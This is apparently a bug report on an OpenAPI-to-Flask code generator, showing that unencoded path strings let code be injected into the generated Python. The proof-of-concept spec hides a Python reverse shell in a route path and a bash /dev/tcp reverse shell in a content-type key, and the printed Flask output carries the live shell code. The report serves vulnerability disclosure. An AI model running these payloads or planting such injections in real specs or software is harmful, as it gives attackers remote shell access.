Python Code Generator does not encode payloads and could be used to inject malicious code

[awillard1]

Describe the bug Python code generator does not encode payloads and could be used to inject malicious payloads.

To Reproduce If you create a definition as follows, you can see the Python code generation does not encode the paths data that is sent.

{
    "openapi": "3.0.2",
    "info": {
        "version": "1.0.0",
        "title": "Code",
        "description": "Code Proof of concept"
    },
    "paths": {
        "/nothing/code-PoC', methods=['get']);import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('10.0.0.1',4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn('/bin/sh');#": {
            "get": {
                "operationId": "CodeInjection",
                "responses": {
                    "200": {
                        "description": "Let's do this!",
                        "content": {
                            "application/json\"'; bash -i >& /dev/tcp/10.0.0.1/4444 0>&1 | echo \"": {}
                        }
                    }
                }
            }
        }
    }
}

This results in:

from flask import Blueprint, request
from webargs.flaskparser import parser
from marshmallow import Schema, fields
from ..schemas import model
from .. import impl

bp = Blueprint('nothing', __name__)

@bp.route('/nothing/code-PoC', methods=['get']);import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('10.0.0.1',4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn('/bin/sh');#', methods=['get'])
def CodeInjection():

    return impl.nothing.CodeInjection()

Screenshots

[aarifkhan7]

Please assign this to me, I want to work on this issue. @akshaydeo @awillard1